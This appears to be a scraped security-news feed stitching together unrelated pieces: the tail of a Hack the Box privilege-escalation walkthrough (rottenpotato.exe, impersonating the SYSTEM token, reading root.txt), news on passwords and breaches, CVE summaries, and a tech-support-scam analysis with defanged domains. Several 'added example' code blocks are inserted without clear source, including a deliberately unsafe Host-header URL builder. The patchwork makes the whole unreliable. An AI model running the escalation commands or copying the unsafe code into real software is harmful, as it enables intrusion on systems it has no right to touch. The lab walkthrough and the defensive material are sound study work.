Now type the commands below to execute the exe file and then add the SYSTEM token under impersonated user tokens.

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

Then, when you run the getuid command again, it will tell you that you have escalated to NT AUTHORITY\\SYSTEM.

Then go back to the /Users directory and look at the directories available inside it. You will find root.txt inside C:\Users\Administrator\Desktop; go and grab it to finish the task.

cd Administrator
cd Desktop
cat root.txt

Fabulous!! The task has been completed and the box is hacked.
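As an added example (not from Hacking Articles), the PowerShell audit below checks a SQL Server host for the three weaknesses this chain relied on: the sa login being enabled, xp_cmdshell being enabled (the mechanism mssql_exec uses to run commands), and plaintext credential files like conn-info.txt sitting on SMB shares. The instance name and the share scan are assumptions for your environment.

```powershell
# Post-engagement hardening audit for a SQL Server host (added example; not Hacking Articles'
# code). Assumptions: run locally as an administrator with Windows authentication; -Instance
# is a placeholder; the Get-SmbShare cmdlet (Windows 8 / Server 2012 and later) is available.
param([string]$Instance = 'localhost')

Add-Type -AssemblyName System.Data
$findings = New-Object System.Collections.Generic.List[string]

# Runs one query and returns the result set as a DataTable (the leading comma stops
# PowerShell from unrolling the table into its rows).
function Invoke-AuditQuery {
    param([string]$ConnectionString, [string]$Sql)
    $conn = New-Object System.Data.SqlClient.SqlConnection $ConnectionString
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()
        $cmd.CommandText = $Sql
        $table = New-Object System.Data.DataTable
        [void](New-Object System.Data.SqlClient.SqlDataAdapter $cmd).Fill($table)
        return ,$table
    } finally {
        $conn.Close()
    }
}

$connStr = "Server=$Instance;Integrated Security=True;Connection Timeout=5"

# 1. sa login. The walkthrough authenticated as sa with a password recovered from tester.exe;
#    sa should be disabled (or renamed) and Windows authentication used instead.
$sa = Invoke-AuditQuery $connStr "SELECT is_disabled FROM sys.sql_logins WHERE name = 'sa'"
if ($sa.Rows.Count -gt 0 -and -not [bool]$sa.Rows[0].is_disabled) {
    $findings.Add('sa login is enabled')
}

# 2. xp_cmdshell. mssql_exec runs its payload through xp_cmdshell; report if it is enabled.
$xp = Invoke-AuditQuery $connStr "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'"
if ($xp.Rows.Count -gt 0 -and [int]$xp.Rows[0].value_in_use -eq 1) {
    $findings.Add('xp_cmdshell is enabled')
}

# 3. Plaintext credentials on SMB shares, like conn-info.txt under zz_Archived\SQL. Scans the
#    non-administrative shares for text/config files containing password-style assignments.
$sharePaths = Get-SmbShare | Where-Object { $_.Path -and $_.Name -notmatch '\$$' } |
              Select-Object -ExpandProperty Path
foreach ($path in $sharePaths) {
    Get-ChildItem -Path $path -Recurse -File -Include *.txt,*.ini,*.config,*.xml -ErrorAction SilentlyContinue |
        Select-String -Pattern '(pass(word)?|pwd)\s*[:=]' -List |
        ForEach-Object { $findings.Add("Possible plaintext credential in $($_.Path) (line $($_.LineNumber))") }
}

if ($findings.Count -eq 0) {
    Write-Output 'No findings.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
    exit 1
}
```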

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.

The post Hack the Box Challenge: Tally Walkthrough appeared first on Hacking Articles.

Despite Major Data Breaches, Users’ Bad Password Security Habits Haven’t Improved

Even though password security is a top priority for organizations, only 55 percent of users would change their credentials after a breach. That’s the sobering state of affairs detailed in “The Psychology of Passwords: Neglect Is Helping Hackers Win,” a new report from password management firm LastPass.

And bad habits don’t stop there. The report also found that 59 percent of respondents use the same password across multiple accounts. Despite the rising costs of data breach recovery and ongoing, large-scale compromises, LastPass found that “password behaviors remain largely unchanged from two years ago.”

A Persistent Problem

Companies around the world and across all sectors are struggling to protect user passwords. As noted by Wired, Twitter recently disclosed that it had inadvertently stored unencrypted passwords in an internal system. While Twitter typically hashes user passwords using bcrypt, a bug in its hashing protocol led to the unprotected storage of credentials that were kept even after hashing was complete.

Although the company said it doesn’t believe the information was accessed or used by cybercriminals, it advised all users to change their passwords for good measure. As noted by the LastPass report, however, just over half of users are likely to comply.

Also problematic is the common practice of employees sharing passwords for internal resources using tools such as Trello. According to Krebs on Security, simple web searches revealed “unprotected personal Trello boards that listed employer passwords and other sensitive data.”

This lines up with LastPass data, which found that, while 5 million records are compromised every day, it still takes organizations an average of 66 days to contain a breach. Posting passwords on public collaboration forums makes containment that much more difficult.

The Password Security Paradox

As noted by TechRepublic, the new report “confirms the paradoxical views many people have about passwords and highlights alarming trends in personal online security.” For example, 90 percent of users said they believe their online accounts are at risk regardless of the strength of their passwords and 91 percent recognize that password reuse heightens this risk. Meanwhile, 39 percent reported that they would never change their password if they were not required to do so.

Users also underestimated their total number of online accounts. While 79 percent of those asked said they had between one and 20 online accounts, LastPass found that, on average, employees were responsible for 191 passwords. Still, 59 percent of respondents said they mostly or always use the same password for different accounts, 51 percent don’t believe that cybercriminals can figure out their password, and 21 percent said they don’t see a problem with repeating the same password across accounts.

There’s a gap between user belief and behavior. Ninety-two percent of respondents said password security was a “serious matter,” yet 61 percent said they refuse to change passwords for fear of forgetting their login information.

Sandor Palfy, chief technology officer (CTO) of identity and access management at LastPass parent company LogMeIn, put it simply: “The cyberthreats facing consumers and businesses are becoming more targeted and successful, yet there remains a clear disconnect in users’ password beliefs and their willingness to take action.”

The post Despite Major Data Breaches, Users’ Bad Password Security Habits Haven’t Improved appeared first on Security Intelligence.

CVE-2018-1000177 (s3_publisher)

A cross-site scripting vulnerability exists in Jenkins S3 Plugin 0.10.12 and older in src/main/resources/hudson/plugins/s3/S3ArtifactsProjectAction/jobMain.jelly that allows attackers able to control file names of uploaded files to define file names containing JavaScript that would be executed in another user's browser when that user performs some UI actions.

CVE-2018-1000176 (email_extension)

An exposure of sensitive information vulnerability exists in Jenkins Email Extension Plugin 2.61 and older in src/main/resources/hudson/plugins/emailext/ExtendedEmailPublisher/global.groovy and ExtendedEmailPublisherDescriptor.java that allows attackers with control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured SMTP password.

CVE-2018-1000168 (nghttp2)

nghttp2 version >= 1.10.0 and nghttp2 <= v1.31.0 contains an Improper Input Validation CWE-20 vulnerability in ALTSVC frame handling that can result in segmentation fault leading to denial of service. This attack appears to be exploitable via network client. This vulnerability appears to have been fixed in >= 1.31.1.

National Standard on Personal Information Security Goes into Effect in China

On May 1, 2018, the Information Security Technology – Personal Information Security Specification (the “Specification”) went into effect in China. The Specification is not binding and cannot be used as a direct basis for enforcement. However, enforcement agencies in China can still use the Specification as a reference or guideline in their administration and enforcement activities. For this reason, the Specification should be taken seriously as a best practice in personal data protection in China, and should be complied with where feasible.

The Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents. It includes (without limitation) basic principles for personal information security, notice and consent requirements, security measures, rights of data subjects and requirements related to internal administration and management. The Specification establishes a definition of sensitive personal information, and provides specific requirements for its collection and use.

Read our previous blog post from January 2018 for a more detailed description of the Specification.

Crypto-Miners Supplant Ransomware as the Top Healthcare Cybersecurity Threat

Malicious crypto-miners have supplanted ransomware as the top healthcare cybersecurity threat, a cross-sector report revealed.

The April 2018 edition of the Healthcare Information and Management Systems Society (HIMSS)’s “Healthcare and Cross-Sector Cybersecurity Report,” which referenced the recent “Comodo Cybersecurity Q1 2018 Report,” found that crypto-miner attacks increased over the course of the quarter while ransomware attacks decreased.

Comodo’s researchers also noted that attackers are debuting innovations for embedding malware within crypto-miners, a trend that could indicate a preference among bad actors for cryptojacking over more traditional threats.

Crypto-Miners, Backdoors and More

On June 11 at the Healthcare Security Forum, Lee Kim, privacy and security director for HIMSS, will present a talk titled “Through the Looking Glass: What’s Happening Now and in the Future.” Her session will expand on some of the findings from the April 2018 HIMSS report.

In addition to crypto-miners, HIMSS featured other threats in its roundup, including an authentication bypass vulnerability that facilitates code execution with root privileges on some ASUS routers. The report noted that public exploits are readily available for this weakness.

HIMSS also covered a threat group targeting healthcare firms with a custom backdoor, a remote code execution vulnerability in the 7-Zip program and a Python-based crypto-miner that uses the ETERNALROMANCE exploit to spread to vulnerable Windows PCs.

Improving Healthcare Cybersecurity, One Asset at a Time

Ahead of her presentation at the Healthcare Security Forum, Lee advised healthcare organizations to take inventory of their assets’ locations and configurations. That way, security teams will be in a better position to defend the network from nation-state actors, criminals and zealous competitors.

“Think like an attacker and a defender,” she advised, as quoted by Healthcare IT News. “Know how the enemy moves, what they go after, and who they may be — this intelligence can go a long way.”

Lee also emphasized the importance of establishing communication channels for defending against phishing emails.

The post Crypto-Miners Supplant Ransomware as the Top Healthcare Cybersecurity Threat appeared first on Security Intelligence.

With More Than 1,200 Cybersecurity Vendors in the Industry, How Do You Stand Out?

Like most who attend RSA, I set a goal for myself to walk through the North and South exhibit halls and stop by every booth to “keep up” with the latest messaging and capabilities across the cyber landscape. I started off the day optimistic and full of enthusiasm. This year, I decided to keep track of the booths I visited even if it was just for a brief few seconds. I went to 287 booths in the North Hall and 279 in the South Hall. That’s right: I counted and hit 566 booths in a little over three hours.

What did I learn from this year’s event? Aside from the latest industry buzzwords and jargon, — threat sharing, machine learning, AI, data lakes, SOC automation, attack surface discovery and exploitation — every vendor sounded the same, and you had to go beyond the surface level to find out how they differentiate themselves.

I left disappointed that not once did I hear a vendor talk about helping customers by focusing on their desired outcomes, value and service level agreements.

Our marketing team recently released the following data points, which I believe are telling of where we are as an industry.

More than 1,200 vendors compete in the cybersecurity market today. Conservatively, if each vendor offers an average of three products, with each product carrying an average of five features, that would make the cybersecurity market replete with nearly 20,000 features.

There is no shortage of competition for features in our industry. Look at most cybersecurity vendor websites and you’ll find lots of content around product capabilities. It’s no wonder customers are under assault by relentless adversaries. Each new threat vector requires a new defensive technology, which typically takes the form of a new product (if not a new vendor), complete with its own set of features.

That’s why McAfee focuses on sound architectural principles when designing modernized cybersecurity environments. We provide an open, proactive and intelligent architecture to protect data and stop threats from device to cloud. This allows customers to onboard new defensive technologies quickly to maximize their effectiveness. And, with our open, integrated approach, customers benefit from an overall security system with a whole greater than the sum of its parts. They get the benefit of both worlds: abundant vendor choice within a unified, cohesive system.

RSA 2019 Goals: Find vendors who are talking about solving customer challenges by focusing on outcomes, architecture interoperability, efficacy and efficiencies with some service level agreements mixed in for good measure. I really believe McAfee is setting a new higher standard for the cyber landscape that is essential and meaningful to our customers and the partner ecosystem. Let’s see if anybody else does something similar (or, if anybody else follows suit, or something like that).

The post With More Than 1,200 Cybersecurity Vendors in the Industry, How Do You Stand Out? appeared first on McAfee Blogs.

Video: State of the Current Threat Landscape (RSA 2018)

During this year's RSA Conference, Highwire PR and WSJ Pro Cybersecurity hosted several panel discussions, including this one with CA Veracode CTO Chris Wysopal. Chris joined Andrea Limbago, chief social scientist at Endgame, and Michael Daniel, president and CEO of Cyber Threat Alliance, to talk about the current and evolving threat landscape. Throughout the panel, you'll learn more about how automation is changing the game when it comes to security, why your application security and detection game has to be on point, why the future of development will be secure by design - and more.



IDG Contributor Network: Don’t fall off the log!

In the world of datacenter security, a firewall is often seen as the ultimate protector—the final perimeter of defense. In the public cloud, however, the perimeter is fluid, and simple software configuration changes can move it. You can ruggedize your firewall as much as possible, but it can be bypassed. IT and security managers today are well aware of this possibility and, as a result, use extra layers of security: configuration management solutions, antivirus (or other endpoint solutions), WAF, DLP, IDS and other “homemade” monitoring solutions.

The common denominator of all these solutions is the vast array of generated logs because they are needed to thoroughly monitor an IT environment. Log absence results in blind spots in your infrastructure and potentially leaves you vulnerable to threats. Orchestrating a cybersecurity solution typically results in a large volume of logs from multiple sources and systems (typically gigabytes per day). Log management at scale is now a core discipline of security operations in the cloud. Effective log management needs to address two key questions: 1. Which logs to store and how, and 2. How to analyze log data effectively.


IDG Contributor Network: 6 takeaways (and 3 predictions) from CISO meetings at the RSA Conference

Here’s the problem: at my normal rate of approximately two conversations with Chief Information Security Officers (CISOs) per month, the “present discounted value” of the information gathered never quite brings this picture into clear focus – this is where the RSA Conference comes to the rescue.

Lessons learned from RSA Conference 2018

If you work in the cybersecurity industry, April was marked on your calendar as the month the now mammoth RSA Conference that took place in San Francisco. While this is always a time to catch up with former colleagues who also work in the security business, it also presents a unique opportunity to meet with many CISOs in a short span of time. I personally took part in approximately 12 meetings with CISOs over a span of three days.


Top five biggest data breaches of 2017

The previous year was marked by the largest data breaches in the history of cybersecurity. Hardly a week went by without news that some company had exposed and leaked consumer and commercial data. In fact, according to the Breach Level Index (BLI), 1454 organizations in various industries failed to safeguard their databases, resulting in the entirety of their users’ information being exposed for all to see. And all this happened in 2017 alone.

To help put all this in perspective, we’ll recap the five most recent, and notable, data breaches in America, and the consequences to which they’ve led. Each of the following data breaches has a “risk score,” based on many factors: financial loss, the amount of sensitive information lost, and the damage it caused to the company in question, its customers, and its partners. The following data breach ratings are presented in descending order.


Equifax

Headquarters: Atlanta, Georgia, United States

July 12, 2017

Risk Score: 10.0

143 million records

Equifax, one of the three major credit reporting agencies, suffered a massive data breach in mid-May through July 2017. If you have a credit report, there’s a good chance you’re one of the 143 million Americans whose sensitive personal information was exposed in this Equifax data breach. During the attack, malicious outsiders managed to steal data containing people’s names, Social Security Numbers, birth dates, addresses, and in many cases, driver’s license numbers. They also hacked credit card numbers for 209,000 people, and dispute documents with personal identifying information for about 182,000 people.

River City Media

Headquarters: Jackson, Wyoming, United States

June 3, 2017

Risk Score: 9.8

1.3 billion records

River City Media, a huge email marketing organization, failed to safeguard backups of its database containing 1.3 billion email accounts. Besides emails, the database included users’ real names, IP addresses, and often physical addresses. River City Media used this personal data in its spam email campaigns, in which the company promised “credit checks, education opportunities, and sweepstakes.” There’s a risk that your personal data, or the data of someone you know, was made public.

Deep Root Analytics/ Republican National Committee

Headquarters: Arlington, Virginia, United States

June 13, 2017

Risk Score: 9.6

198 million records

Deep Root Analytics, a marketing company working for the Republican National Committee, inadvertently left sensitive personal details for roughly 62% of the US population on a public domain. The data breach was named the largest breach of electoral data in the United States to date. Along with information about 200 million US citizens’ home addresses, birthdates, phone numbers and political views, the breach also included analyses used by political groups to predict where individual voters fall on controversial issues such as gun ownership, stem cell research and abortion rights. The data was placed on a public Amazon cloud server and could be accessed and downloaded by anyone with a link.


Alteryx

Headquarters: Irvine, California, United States

December 19, 2017

Risk Score: 9.4

123 million records

Alteryx, a California based marketing and analytics firm, accidentally left an unsecured database online, exposing sensitive information for about 123 million U.S. households.  The personal details included street addresses, demographics, and family finances, as well as information pertaining to home and auto ownership, and even specifics about children in the household. The database was accessible to anyone with an Amazon Web Services account, the storage service Alteryx used to host the files.

Center for Election Systems at Kennesaw State University

Headquarters: Kennesaw, Georgia, United States

March 3, 2017

Risk Score: 9.1

7.5 million records

During a breach of the Kennesaw State University (KSU) Center for Election Systems, sensitive data on Georgia’s 6.7 million voters was exposed to potential hackers, and remained accessible for months. The data included Social Security Numbers, party affiliation, and birthdates — as well as passwords used by county officials to access election management files. The center was notified about the possible vulnerabilities in August 2016; however, it didn’t take the necessary security measures to rectify the problem.

What if my personal data was exposed?

There are literally thousands of data breaches we could discuss, but we chose the biggest breaches that could potentially affect you, your family, and your friends. With that in mind, we urge you to take a moment and visit OneRep.com and see exactly which websites are posting information about you online. OneRep’s service has proved itself invaluable to many customers and is a “must have” for anyone who cares about their online privacy and security. OneRep can automatically remove your name, address, credit history, birthdate, and other information from the Internet, and their ongoing privacy protection continually monitors the internet for relisted records and removes them on your behalf. We also recommend trying OneRep’s 5-day free trial plan, which includes Internet scanning, removal of your personal information from 62 people-search websites and premium support.

The post Top five biggest data breaches of 2017 appeared first on TechWorm.

‘World of Warcraft’ cyberattacker sentenced to year in prison

One World of Warcraft player is paying the price for taking a virtual rivalry too far. A US federal court has sentenced Romanian man Calin Mateias to spend a year in federal prison after he pleaded guilty to launching a distributed denial of service attack against WoW's servers in response to being "angered" by one player. The 2010 traffic flood knocked thousands of players offline and cost Blizzard $30,000 (which Mateias repaid in April) in recovery expenses.

Source: NBC Los Angeles

The US Is Unprepared for Election-Related Hacking in 2018

This survey and report is not surprising:

The survey of nearly forty Republican and Democratic campaign operatives, administered through November and December 2017, revealed that American political campaign staff -- primarily working at the state and congressional levels -- are not only unprepared for possible cyber attacks, but remain generally unconcerned about the threat. The survey sample was relatively small, but nevertheless the survey provides a first look at how campaign managers and staff are responding to the threat.

The overwhelming majority of those surveyed do not want to devote campaign resources to cybersecurity or to hire personnel to address cybersecurity issues. Even though campaign managers recognize there is a high probability that campaign and personal emails are at risk of being hacked, they are more concerned about fundraising and press coverage than they are about cybersecurity. Less than half of those surveyed said they had taken steps to make their data secure and most were unsure if they wanted to spend any money on this protection.

Security is never something we actually want. Security is something we need in order to avoid what we don't want. It's also more abstract, concerned with hypothetical future possibilities. Of course it's lower on the priorities list than fundraising and press coverage. They're more tangible, and they're more immediate.

This is all to the attackers' advantage.

Facebook is working on an ad-free subscription-based version

Are you ready for an ad-free Facebook experience?

Facebook has been conducting a market research among its consumers for an ad-free subscription version of the social network to see if they’d be interested in paying for their privacy, according to Bloomberg.

As rumored in the past, Facebook has considered the idea of a paid subscription before; however, this time there is more internal momentum to pursue it, mainly because the company is facing a crisis of public trust after the Cambridge Analytica privacy scandal.

It is a known fact that Facebook has been the leading platform for social media advertising and marketing due to its enormous online audience and high user engagement rates. The majority of the social network’s revenues are generated through advertising targeted with this user data.

Now that consumer sentiment is changing, and with mounting evidence that its huge user base is reaching saturation because of this insecurity about privacy, Zuckerberg & Co. might be looking to diversify beyond a one-trick revenue policy. That could include an ad-free iteration.

Facebook declined to comment on a subscription-based ad-free service, yet in recent weeks one of the company’s highest-ranking executives has left open the possibility of a subscription option. During the company’s first-quarter earnings call last week, Chief Operating Officer Sheryl Sandberg said the company has “certainly thought about lots of other forms of monetization including subscriptions, and we’ll always continue to consider everything.”

Also, during his testimony to Congress, chief executive Mark Zuckerberg told lawmakers that there would “always be a version of Facebook that is free,” as the site says, “it’s free and always will be.”

The post Facebook is working on an ad-free subscription-based version appeared first on TechWorm.

Top 10 Trending Keywords in .Com and .Net Registrations in April

With more than 300 million domain names registered globally, there are numerous examples of trending keywords reflected by domain name registrations. We have shown in the past that there is a correlation between domain name registrations and newsworthy and popular events, as well as anticipated trends.

Keeping in the spirit of the zeitgeist that .com and .net domain name registration trends can represent, Verisign publishes this monthly blog post series identifying the top 10 trending .com and .net keywords registered in English during the preceding month.


Here are the top 10 trending keywords registered in April 2018. Any surprises?

Rank  .com          .net
1     funeral       base
2     lazy          pen
3     holo          accident
4     realtor       attorney
5     hainan        marijuana
6     regenerative  child
7     locations     michigan
8     bankruptcy    gulf
9     cerveza       pest
10    ballistic     christ

Click here to see other domain trends blog posts, and make sure you check back the second Tuesday of each month for the latest keyword registration trends in .com and .net. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Note: Each list was developed by examining keyword registration growth relative to the preceding month, such that those keywords with the highest percentage of registration growth are being reported on. This method is used to eliminate commonly registered keywords, such as “online” and “shop,” to provide a true look at monthly trends. In order to be included, a keyword must experience a minimum threshold in registration growth month over month. Qualifying keywords with the highest volume of registrations are then ranked and included in the list.

The post Top 10 Trending Keywords in .Com and .Net Registrations in April appeared first on Verisign Blog.

A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking

Since hackers have started exploiting two recently disclosed unpatched critical vulnerabilities found in GPON home routers, security researchers have now released an unofficial patch to help millions of affected users left vulnerable by their device manufacturer. Last week, researchers at vpnMentor disclosed details of an authentication bypass (CVE-2018-10561) and a root-remote code execution

IDG Contributor Network: How consumer omnichannel authentication benefits businesses

Consumers' rising expectations for an omnichannel experience are driving innovations in user authentication methods. From a business perspective, the idea of switching over to new authentication methods can be hard to swallow. After all, security is not a profit center. But the cost-benefit reality of omnichannel authentication is more nuanced; the innovative methods that are transforming consumers’ authentication experiences also benefit the business with:

  • Improved security posture
  • Less technology to manage
  • Happier customers

Authentication trends and changing user expectations

Many enterprises are already working to introduce omnichannel authentication experiences for customers. For example, a bank may think in terms of the different channels through which it interacts with consumers and strive to apply a common set of security layers for:


CVE-2018-1248 (authentication_manager)

RSA Authentication Manager Security Console, Operation Console and Self-Service Console, version 8.3 and earlier, is affected by a Host header injection vulnerability. This could allow a remote attacker to potentially poison HTTP cache and subsequently redirect users to arbitrary web domains.
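The pattern behind a Host header injection of the kind described above, as an added illustration (not code from RSA Authentication Manager): the unsafe URL builder that echoes the client-supplied host beside its hardened form. The allowlist, hostnames and header names are constructed for the example.

```python
"""Host header injection: unsafe vs. hardened absolute-URL construction.

Added example, not RSA code.  The unsafe builder copies whatever Host the
client sent into an absolute URL (a Location header, a password-reset link).
If a shared cache stores that response, later visitors are sent to the host
the attacker chose.  The hardened builder only echoes allowlisted hosts."""
from urllib.parse import urlsplit

# Constructed allowlist: the hostnames this service is legitimately served on.
ALLOWED_HOSTS = {"console.example.com", "console.example.com:7004"}
CANONICAL_HOST = "console.example.com"


def _request_host(headers):
    """Pick the host the way proxy-aware frameworks often do: a forwarded
    header first, then Host.  Both are client-controllable unless the
    reverse proxy strips them, which is why neither can be trusted as-is."""
    return headers.get("X-Forwarded-Host") or headers.get("Host", "")


def build_redirect_unsafe(headers, path):
    """Vulnerable pattern: trusts the client-supplied host verbatim."""
    return f"https://{_request_host(headers)}{path}"


def host_is_allowed(host):
    """Exact-match check against the allowlist (hostnames are case-insensitive)."""
    return host.lower() in ALLOWED_HOSTS


def build_redirect_safe(headers, path):
    """Hardened pattern: an unknown host is replaced by the canonical name
    (rejecting the request with 400 is the other reasonable choice)."""
    host = _request_host(headers)
    if not host_is_allowed(host):
        host = CANONICAL_HOST
    return f"https://{host}{path}"


def redirect_escapes(url):
    """Cache-poisoning check for a generated URL: does it leave our hosts?"""
    return urlsplit(url).netloc.lower() not in ALLOWED_HOSTS
```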

CVE-2018-1247 (authentication_manager)

RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application.

Tech support scam uses fake Shoppers Stop to draw from thousands of forced ad injections

These days, there are a lot of browser locker campaigns fueled by malvertising or redirection from hacked sites. But the Shoppers Stop tech scam campaign is actually a bit of both, using compromised sites injected with advertising code that redirects users to other threats, including tech support scams, via malvertising.

We believe those ad injections came from pirated CMS themes. Normally, these are WordPress themes that people typically have to pay to download. Instead, they are offered for free, with a bonus bundle of malicious code.

One aspect we noticed as part of the redirection mechanism was an online shopping portal registered to domains with suspicious TLDs such as .trade, .accountant, .ml that quickly rotate to make blacklisting approaches futile. However, using that same artifact, we were able to flag other browser locker incidents for this particular campaign.

The browlock

The browser locker used in this campaign is a spin-off of the Google Chrome Safebrowsing warning. The scammers have added scare tactics to it (e.g. Hard Drive Safety Delete Starting in: 5:00 minutes), as well as authentication pop-ups that prevent the user from closing the browser tab or window.

In this template, the crooks have not bothered with changing the IP address (supposedly of their victim), which still belongs to the original creator of that page, located somewhere in India. The toll-free number, dynamically populated both on the page and the URL, is what the scammers hope potential victims will dial.


As mentioned earlier, the number one vector of traffic to these browser locker pages is advertising—more precisely, malvertising. Perpetrators can spend a small budget and attract a fair amount of visits through one of many ad networks. More and more, we are seeing ad platforms ensure that visitors are legitimate and not bots or others using anonymous proxies.

In some cases, this ‘lead funneling’ is doubled by the use of a traffic distribution system (TDS). Here’s an example we captured via the well-documented BlackTDS, redirecting users to ad networks and eventually to the browlock.

BlackTDS has been the source of many browser lockers that have been caught by other researchers as well. For example, on March 29, Vitali Kremez reported an infection chain to a browlock started via smarttraffics[.]ml.

Another instance of the same threat was found as part of an ongoing campaign of compromised websites injected with ad network code. There have been reports from site owners since late last year, but the trend has increased recently.

Denis Sinegubko from Sucuri noted that an ad script with the same ID was injected into over 2,000 websites and drew the conclusion that this was not a case of webmasters using ads for monetization, but rather unwanted ad injections into their CMS. Using the Source Code Search Engine PublicWWW, we found thousands of websites with the same ad codes:

For several weeks now, we have reproduced numerous infection chains to exploit kits, browlocks, and other scams via those injected ads.


The server side PHP code (WP-VCD malware) used to load those ads can be seen below. Thanks to our friends at Sucuri for sharing it.

Sucuri’s SiteCheck detects these server-side injections as rogueads.unwanted_ads. The leading cause of these injections is nulled themes, pirated copies of paid-for CMS themes. The free lunch often comes with backdoors, a lack of future updates, and of course a violation of licensing and copyright laws.

In the following traffic capture (thanks Baber Pervez), we notice the ad injection leading to a malicious redirection chain via the following sequence:

  • dreams-al[.]com (Compromised site)
    • oclasrv[.]com (PropellerAds ad network)
      • deloton[.]com (PropellerAds ad network)
        • xml.adhunter[.]media (XML feed)
          • updating23001.accountant (Shoppers Stop Redirector)
            • techno59033.download (Browlock)

We have observed the same pattern (or similar pattern) from many sites that had been injected with the ad code snippet.


The redirector page acts as a gateway to the browser locker. On the surface, it is an online shopping store called Shoppers Stop, offering merchandise for men and women. Shoppers Stop is also the name of a well-known Indian department store chain with over 83 outlets across the country. We believe the scammers may have been using that name to set up either a fake online store or a demo (many scammers are also into website design).


This domain is itself a clone of goshopper[.]info, which was registered via privacy protection on 2017-10-27 and is now parked:

However, in these malicious redirections, the online shopping site is used purely as a redirection mechanism, done in such a way that victims never actually view any of its content. The redirection is done via a 301 redirect, also known as a permanent redirect, which website owners typically use for SEO purposes when they have moved their property to another (permanent) location.

location: https://techno59033[.]download/TollFree1-877-670-2749
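A detection check over a captured redirect chain, as an added example (not Malwarebytes tooling): it refangs the reported domains, walks each hop, and flags the traits this funnel shows, a hop on a throwaway TLD and a 301 into a landing page whose path carries the toll-free number. The capture is constructed from the sequence listed above; the TLD list and the verdict rule are the example's own assumptions.

```python
"""Redirect-chain triage for the Shoppers Stop browlock funnel described above.

Added example, not Malwarebytes code.  SAMPLE_CHAIN is constructed from the
hop sequence in the write-up (defanged as reported); paths other than the
final Location are placeholders."""
import re
from urllib.parse import urlsplit

# TLDs the write-up associates with the rotating redirector/browlock domains.
SUSPICIOUS_TLDS = {"trade", "accountant", "ml", "download"}

# North American toll-free number written into a URL path, e.g. TollFree1-877-670-2749
TOLLFREE_RE = re.compile(r"1-8(?:00|33|44|55|66|77|88)-\d{3}-\d{4}")

# Constructed capture: "<status> <url> <Location or ->", one hop per line.
SAMPLE_CHAIN = """\
200 http://dreams-al[.]com/ -
302 http://oclasrv[.]com/ http://deloton[.]com/
302 http://deloton[.]com/ http://xml.adhunter[.]media/
302 http://xml.adhunter[.]media/ https://updating23001.accountant/
301 https://updating23001.accountant/ https://techno59033[.]download/TollFree1-877-670-2749
200 https://techno59033[.]download/TollFree1-877-670-2749 -
"""

# Constructed benign chain: an ordinary canonical-host redirect.
BENIGN_CHAIN = """\
301 http://example.com/ https://www.example.com/
200 https://www.example.com/ -
"""


def refang(value):
    """Turn the defanged notation used in reports back into a parseable URL."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def tld_of(host):
    return host.rsplit(".", 1)[-1].lower() if host else ""


def parse_capture(text):
    """Parse the three-column capture format into hop dicts."""
    hops = []
    for line in text.strip().splitlines():
        status, url, location = line.split()
        hops.append({
            "status": int(status),
            "url": refang(url),
            "location": None if location == "-" else refang(location),
        })
    return hops


def hop_findings(hop):
    """Return the suspicious traits observed on one hop."""
    flags = []
    src = urlsplit(hop["url"])
    if tld_of(src.hostname) in SUSPICIOUS_TLDS:
        flags.append("suspicious_tld")
    if TOLLFREE_RE.search(src.path):
        flags.append("tollfree_in_path")
    if hop["location"]:
        dst = urlsplit(hop["location"])
        if tld_of(dst.hostname) in SUSPICIOUS_TLDS:
            flags.append("redirects_to_suspicious_tld")
        if TOLLFREE_RE.search(dst.path):
            flags.append("tollfree_in_path")
        # A 301 is cached by browsers, so the victim keeps landing on the browlock.
        if hop["status"] == 301 and dst.hostname != src.hostname:
            flags.append("permanent_offsite_redirect")
    return flags


def chain_flags(hops):
    flags = set()
    for hop in hops:
        flags.update(hop_findings(hop))
    return flags


def is_browlock_funnel(hops):
    """Alerting verdict (constructed rule): a throwaway-TLD hop plus a phone
    number written into a landing URL path."""
    flags = chain_flags(hops)
    return "tollfree_in_path" in flags and bool(
        flags & {"suspicious_tld", "redirects_to_suspicious_tld"})


if __name__ == "__main__":
    for hop in parse_capture(SAMPLE_CHAIN):
        print(hop["status"], hop["url"], hop_findings(hop))
    print("browlock funnel:", is_browlock_funnel(parse_capture(SAMPLE_CHAIN)))
```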

Performing a search on the address provided in the contact page gives us a lead about a .com domain called e-storekart[.]com created on November 7, 2017. While there may not seem to be anything special about it (it is yet another clone), its whois information provides us a bit more information than the other domains we had cataloged before.


This domain was one of the few Shoppers Stop templates that didn’t have a completely anonymized whois. Querying on the string bhushan, we identified multiple other domains ranging from support sites for printers, help with email, web design, fashion, and more. Many of those domains no longer exist or have already been parked.

But even inactive domains can provide some valuable information. For example, we retrieved an archived copy of antivirustechies[.]us that shows it used to be a “legitimate” tech support page for several different antivirus products.

However, the legitimacy of this company was quickly undermined after a few searches for its phone number. It is associated with many complaint reports indicating that people were cold called with the usual scare tactics (fake Microsoft support):

Additional evidence comes in the form of a browser-locker template with that exact phone number on a page hosted at palmreader[.]website/1-800-245-9970/. If you recall, the browser locker depicted at the beginning of this article is very much the same. The URL contains the phone number in its path, and the fake Safebrowsing template is similar as well.

The registration date for that domain goes back to late August 2017. A couple of other phone numbers are also used here, and hardcoded in the URI path, rather than being generated via an API on-the-fly.

To summarize, the same scammer group that used the Shoppers Stop template late last year has already registered a tech support domain (antivirustechies[.]us) and a phone number with the same type of browser locker as used in their Shoppers Stop campaign.

While it can be tricky to link threats based on material that could have been stolen from others, this information can also be helpful in discovering interesting connections to additional web properties associated with fraudulent activities.

The Shoppers Stop tech support scam is among the top campaigns we are tracking (trailing just behind the .TK and .CLUB campaigns). It’s getting a lot of traffic leads from a large number of sites that have been injected with ads, on top of its other malvertising chains.

